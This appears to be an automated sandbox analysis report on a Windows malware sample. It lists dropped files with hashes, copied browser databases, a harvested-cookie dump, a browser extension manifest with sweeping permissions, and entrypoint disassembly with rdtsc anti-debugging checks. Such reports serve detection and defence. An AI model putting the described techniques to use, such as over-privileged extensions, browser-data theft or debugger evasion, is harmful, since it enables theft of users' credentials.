Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecv37E8.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1611970727133.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe7583a04, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.9544034244886906
Encrypted:	false
SSDEEP:	24576:vlLvaIxfFUziD9gNltkOuvAPIcgooIO3PX2BU:xUz2gNLkOuu
MD5:	6F872A9E59DBDC88C3A7868DADD23D2F
SHA1:	DBEC1F388806EACC0C88F2052BA0A6510B2D22CA
SHA-256:	E1C8F88F32C3E1036ED47A577974FEC63308CCD38059C8FBAC953F687BDF099B
SHA-512:	6342DE3B884FFB7071E41C5B394CEC7FB63071B22102F02E940067F5AEA6019CC4B581730D25B1228B3595549700877FE8B1D86C94A6F2109E3FC0BD194541E8
Malicious:	false
Preview:	.X:.... .......r1.......l~.."...wK..................... .g......-...x3.6-...x_.h.i..........................k.\."...w..............................................................................................Y............B.................................................................................................................. ........&...yW......................................................................................................................................................................................................................................). ,&...y......................+&...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gdiview.msi Download File
Process:	C:\Users\user\Desktop\N1yprTBBXs.exe
File Type:	;1033
Category:	modified
Size (bytes):	237056
Entropy (8bit):	6.262405449836627
Encrypted:	false
SSDEEP:	3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:	7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:	699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:	DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:	92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:	false
Preview:	......................>.......................................................\|.......\|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Web Data1611970737586 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\crx.7z Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	36105
Entropy (8bit):	7.994610469125073
Encrypted:	true
SSDEEP:	768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:	DAFDD7237BA10D0C91295CD1C15749B2
SHA1:	45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:	B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:	50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:	false
Preview:	7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..\|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^\|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...\|....3...X.E.N.I7...]".50.6...or

C:\Users\user\AppData\Local\crx.json Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1981
Entropy (8bit):	5.365969892012237
Encrypted:	false
SSDEEP:	48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
MD5:	B5CEED4A6FA3F501787DE10B4CB02EEE
SHA1:	F09C0A8CA18D825D6CE6F192090EBD0659C7321B
SHA-256:	749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
SHA-512:	02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
Malicious:	false
Preview:	{"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false

C:\Users\user\AppData\Localwebdata1611970737633 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1611970727133.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 14%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1611970727133.txt Download File
Process:	C:\Users\user\AppData\Roaming\1611970727133.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	30168
Entropy (8bit):	3.7189429930762494
Encrypted:	false
SSDEEP:	384:bYasIDQBc4gYdZ6YEIPmh/gMem6hlkS/V:bYasIDQBRgYdZFEi5MQhlksV
MD5:	D65C5C9854C0BC4ADCEFC8E3A091D20A
SHA1:	F3C57CA5C5B2B94F37D9AE7A9DDA841333C65773
SHA-256:	12F769B6CD58E9B7043A2B1F020CA2D4326F759B0E0911B93EB4E3BD69ABF129
SHA-512:	8EE2ECF4897873FDA30631DFE7D0AA9DE2F46DC16FF3D56295882AA808D13E25F30D3301020D6A6049D07DA6ACA1C2A43EF17413EA5EF85A27DA1A16EEDA53D7
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.0.6.:.2.3. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.S.0.".,.....".V.a.l.u.e.".:.".9.f.5.b.a.a.3.6.e.5.b.8.4.d.0.4.a.0.c.b.3.8.2.b.f.8.3.2.8.c.8.2.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".6.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.8.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.6./.2.0.2.0. .1.1.:.3.6.:.2.3. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.C.1.".,.....".V.a.l.u.e.".:.".G.U.I.D.=.6.1.3.2.9.2.3.c.e.0.7.f.4.d.d.5.9.1.6.c.7.c.5.b.c.1.7.c.e.f.8.9.&.H.A.S.H.=.6.1.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.663640140797365
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	N1yprTBBXs.exe
File size:	4999496
MD5:	f7d7c89f3f5cbc925480b46b7b934157
SHA1:	73e389b70cf3d8975ccbaf7d04f4c45cc80be860
SHA256:	2870f899f2e9ec540da321f603cfb1a735dcd06df016718e663dc78fefdf5e0a
SHA512:	9b972e2954c18f706a6f8012a6b76e1f4ce8e76466eae919b55a6225c4f8574586d9f11838d8d63bdd245b11cfd3e581248e9a578f72ff2dd8b6623bebc525eb
SSDEEP:	98304:LWrSa24w3rQ/pE/JFBCnpcYiKAEXXPnsNSkUe:iy4wesJFqpc8dXfUSe
File Content Preview:	MZ......................@............................................H.....L.!This program cannot be run in DOS mode....$.............._..._..._..E_..._..v_..._.Wp_..._.WD__.._.WE_..._..m_..._..}_..._..._H.._.WA_Q.._.Wt_..._.Ws_..._Rich..._........PE..L..

File Icon


Icon Hash:	79f8e470b2f0f083

Static PE Info

General
Entrypoint:	0x4efaf0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x53A28C1B [Thu Jun 19 07:07:07 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	580870fafb7ba77509b9cf13d8f3e2af

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 004EFAF0h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6DAh
pop eax
mov ebx, edi
push esi
add ebx, eax
mov ecx, dword ptr [eax]
popad
popfd
push 00000005h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6E3h
mov edi, ecx
ret
push edx
mov ecx, dword ptr [esi]
jmp eax
inc ecx
mov ebx, dword ptr [ecx]
mov ebp, edi
mov ebx, esi
idiv edx
popad
popfd
mov eax, 004EFE72h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6E5h
mov edi, esp
mov ebp, ebx
mov ecx, dword ptr [edx]
inc edx
mov ebx, dword ptr [ebp+00h]
mov esp, ebp
cmp eax, edx
mov ebx, esp
mov eax, dword ptr [esp]
popad
popfd
push eax
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6DFh
inc edi
mov edx, esp
mov esp, ebp
mov ebx, dword ptr [edi]
push edx
mov eax, esp
inc eax
mov ebp, edi
popad
popfd
push 000013C5h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6DEh
dec ebx
inc esi
idiv ecx
mov edi, esp
call esi
mov edx, esp
cmp eax, edx
popad

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[LNK] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[C++] VS2010 build 30319
[C++] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1565e4	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x162000	0xf918	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x18a000	0x1948	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x172000	0xede4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1217c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13fec0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x121000	0x63c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11fc1e	0x11fe00	False	0.463952419399	data	6.5610538952	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x121000	0x37978	0x37a00	False	0.340704002809	data	5.10261528062	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x159000	0x812c	0x5600	False	0.271666061047	data	4.93291112706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x162000	0xf918	0xfa00	False	0.420390625	data	5.32227888562	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x172000	0x1d332	0x1d400	False	0.00116018963675	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x162888	0xea8	data	Chinese	China
RT_ICON	0x163730	0x8a8	data	Chinese	China
RT_ICON	0x163fd8	0x568	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x164540	0x25a8	data	Chinese	China
RT_ICON	0x166ae8	0x10a8	data	Chinese	China
RT_ICON	0x167b90	0x468	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x167ff8	0x368	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x168360	0xca8	data	Chinese	China
RT_ICON	0x169008	0x1ca8	data	Chinese	China
RT_ICON	0x16ad38	0x668	data	Chinese	China
RT_ICON	0x16b3a0	0x2e8	data	Chinese	China
RT_ICON	0x16b688	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x16b7b0	0xea8	data	Chinese	China
RT_ICON	0x16c658	0x8a8	data	Chinese	China
RT_ICON	0x16cf00	0x568	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x16d468	0x25a8	dBase III DBT, version number 0, next free block index 40	Chinese	China
RT_ICON	0x16fa10	0x10a8	data	Chinese	China
RT_ICON	0x170ab8	0x468	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x1625b0	0x24c	data	Chinese	China
RT_DIALOG	0x162800	0x86	data	Chinese	China
RT_STRING	0x1715c8	0xc6	data	Chinese	China
RT_STRING	0x171690	0x1ba	data	Chinese	China
RT_STRING	0x171850	0xc2	data	Chinese	China
RT_GROUP_ICON	0x16acb0	0x84	data	Chinese	China
RT_GROUP_ICON	0x170f20	0x84	data	Chinese	China
RT_VERSION	0x170fa8	0x2a0	data	Chinese	China
RT_MANIFEST	0x171248	0x37c	XML 1.0 document, ASCII text	Chinese	China

Imports

DLL	Import
